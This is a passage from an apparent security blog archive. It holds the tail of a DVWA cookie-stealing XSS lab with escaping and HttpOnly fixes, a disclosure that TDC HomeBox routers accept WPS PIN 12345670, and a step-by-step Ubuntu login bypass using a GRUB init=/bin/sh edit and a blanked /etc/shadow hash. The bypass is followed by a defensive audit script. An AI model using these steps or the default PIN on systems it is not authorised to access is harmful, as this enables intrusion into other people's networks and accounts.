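def session_cookie_header(session_id):
    """Issue the PHP session cookie with HttpOnly, so a script that does run
    cannot read it through document.cookie, which is what the payload relies on."""
    jar = SimpleCookie()
    jar["PHPSESSID"] = session_id
    jar["PHPSESSID"]["path"] = "/"
    jar["PHPSESSID"]["httponly"] = True
    return jar.output().strip()   # "Set-Cookie: PHPSESSID=...; HttpOnly; Path=/"


if __name__ == "__main__":
    print(render_unsafe("Cookie", GUESTBOOK_PAYLOAD))   # script tag intact
    print(render_safe("Cookie", GUESTBOOK_PAYLOAD))     # shown as &lt;script&gt;...
    print(session_cookie_header("constructed-session-id"))
```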

    *A few pointers for setting up DVWA:
    Edit this file to allow access to the site from other clients on your network:
    Edit this file to change the maximum number of characters in the input field:

    Credit for the use of DVWA and the cookie stealing technique goes here and here.

    Posted in Linux, Networking, Security, Windows

    Hack TDC HomeBox in seconds


    In one of my previous posts I explained a little bit about the flaw in the WPS system and how to exploit it. To summarize: the flaw in WPS enables you to brute-force the eight-digit PIN code, and thereby get access to an otherwise secured wireless network. While the flaw is still there, many router manufacturers have “fixed” it by limiting the number of WPS attempts to their device before locking up for a certain amount of time. The same is true of the TDC HomeBox.

    The TDC HomeBox is preconfigured for the typical user with a predefined SSID of HomeBox-xxxx, where xxxx represents the last four digits of the MAC address. When logging on the first time, users are instructed to use the WPS PIN from a sticker on their router. After that, they are good to go. Do you think that the average user logs on to the router and disables WPS afterwards? In other words – there are a hell of a lot of preconfigured routers out there which never get reconfigured after the initial setup! And here is the fun part – all TDC HomeBoxes I have come across seem to accept the WPS PIN 12345670 – the first PIN that the WPS brute-force application Reaver tries!


    Of course, I tried contacting TDC regarding this problem. I got in touch with a friendly administrator at TDC Forum who asked me to mail him some details, which he would forward to the proper authorities, who would then contact me directly. I wrote a long mail explaining the problem and sent it to him the same day. A week passed with no response. I wrote the guy asking if he had gotten the mail, and still nothing. It has been a month since I sent the mail – I guess that means TDC thinks it is not relevant information?

    Of course, I could be wrong and not all TDC HomeBoxes are affected, but I have yet to find one that is not. Here are pictures of four totally different boxes, which all seem to accept the WPS PIN 12345670 and were thereby all hacked within seconds.


    TDC is one of the biggest ISPs in Denmark. Have a look at the wireless networks in your area – chances are you have one or more HomeBox-xxxx networks nearby. In my opinion you might as well put up a big sign saying FREE WIFI. If you own one of these boxes yourself, please log in and disable WPS.

    Posted in Networking, Security

    Hack Ubuntu Account Password

    In the tutorial Hack Windows 7 Account Password, I showed that having an account password on a Windows computer does not mean that it is unbreakable. In this tutorial we are going to have a look at how to do something similar on the Linux-based system Ubuntu, by hacking the GNU GRUB loader.


    We have a system running Ubuntu 12.10, which we cannot log in to because we do not have the correct password. The objective is to remove the password and gain access.

    1. At boot press Shift to bring up the GRUB loader

    2. Mark the boot option you want to use – here Ubuntu – and press e


    3. Navigate down to the text linux /boot/vmlinuz-3.5

    We are now going to trick the GNU GRUB loader into dropping the normal boot process and instead booting straight into a shell with root privileges.


    4. Change the argument ro to rw

    5. Remove the text splash $vt_handoff

    6. Add the text init=/bin/sh


    Changing ro (read-only) to rw (read-write) allows the root account to change system files during boot instead of just reading them. We don’t need splash $vt_handoff, since it only concerns the graphics shown during boot. Finally we add init=/bin/sh to tell the kernel to execute a shell instead of the standard init.

    7. Press F10 to boot the edited entry

    We have now booted into a shell; let’s check who we are logged in as.

    8. Type whoami

    Nice, we are logged in as root – unlimited power is at our fingertips! Now we want to remove the password for the account hegelund. This can be done in a number of ways; in this tutorial we are going to do it by editing the password hash directly in the shadow file.

    9. Type nano /etc/shadow


    10. Navigate to the desired username – here hegelund


    11. Remove the hash value of the password (the $hashtype$salt$hash part of the second field)

    12. Press Ctrl + X to exit

    13. Press Y to save the changes and confirm by pressing Enter


    14. Reboot the computer

    15. Choose the boot option you want to use – here Ubuntu – and press Enter

    The changes made to the GNU GRUB loader are not permanent, so after the reboot the system should boot up as normal.

    16. Log in as the user hegelund without a password


    The method should work on all Debian-based systems using the GNU GRUB loader. This tutorial serves to prove that if you store sensitive information on your system, you should not rely on an account password alone. Credit for the method goes here.
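    The check an administrator would run to spot the change made in step 11, as an added example in Python that is not part of the original post: it parses /etc/shadow-style lines and reports accounts whose password field is empty, distinguishing them from locked and hashed accounts. The sample lines are constructed and the hashes in them are placeholders; on a real system the text would come from /etc/shadow read as root. The mitigations against this method are a password on the GRUB menu, so the boot entry cannot be edited, and full-disk encryption, so the shadow file cannot be reached without the passphrase.

```python
import re

# Constructed sample of /etc/shadow contents. "hegelund" has had its hash removed,
# as in step 11 above; the other lines show the usual states on an Ubuntu system.
# The hash strings are placeholders, not real hashes.
SAMPLE_SHADOW = """\
root:*:15000:0:99999:7:::
daemon:*:15000:0:99999:7:::
hegelund::15000:0:99999:7:::
alice:$6$Zm9vYmFy$UGxhY2Vob2xkZXJIYXNoT25seQ:15000:0:99999:7:::
bob:!$6$Zm9vYmFy$UGxhY2Vob2xkZXJIYXNoT25seQ:15000:0:99999:7:::
"""

HASH_RE = re.compile(r"^\$[0-9a-z]+\$")  # "$id$..." prefix used by crypt(3)


def classify(password_field):
    """Map the second field of a shadow entry to what it means for login."""
    if password_field == "":
        return "empty"      # no password is required at all
    if password_field[0] in "!*":
        return "locked"     # password login disabled ("!" prefix or "*")
    if HASH_RE.match(password_field):
        return "hashed"
    return "unknown"


def audit_shadow(text):
    """Return {user: status} for every entry; malformed lines are flagged too."""
    statuses = {}
    for number, line in enumerate(text.splitlines(), start=1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) < 9:          # shadow(5) entries have nine fields
            statuses["<line %d>" % number] = "malformed"
            continue
        statuses[fields[0]] = classify(fields[1])
    return statuses


def accounts_without_password(text):
    """Accounts in the state this tutorial's method produces: empty password field."""
    return sorted(user for user, status in audit_shadow(text).items()
                  if status == "empty")


if __name__ == "__main__":
    # On a live system: audit_shadow(open("/etc/shadow").read()) as root.
    print(audit_shadow(SAMPLE_SHADOW))
    print(accounts_without_password(SAMPLE_SHADOW))   # ['hegelund']
```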

    Posted in Linux, Security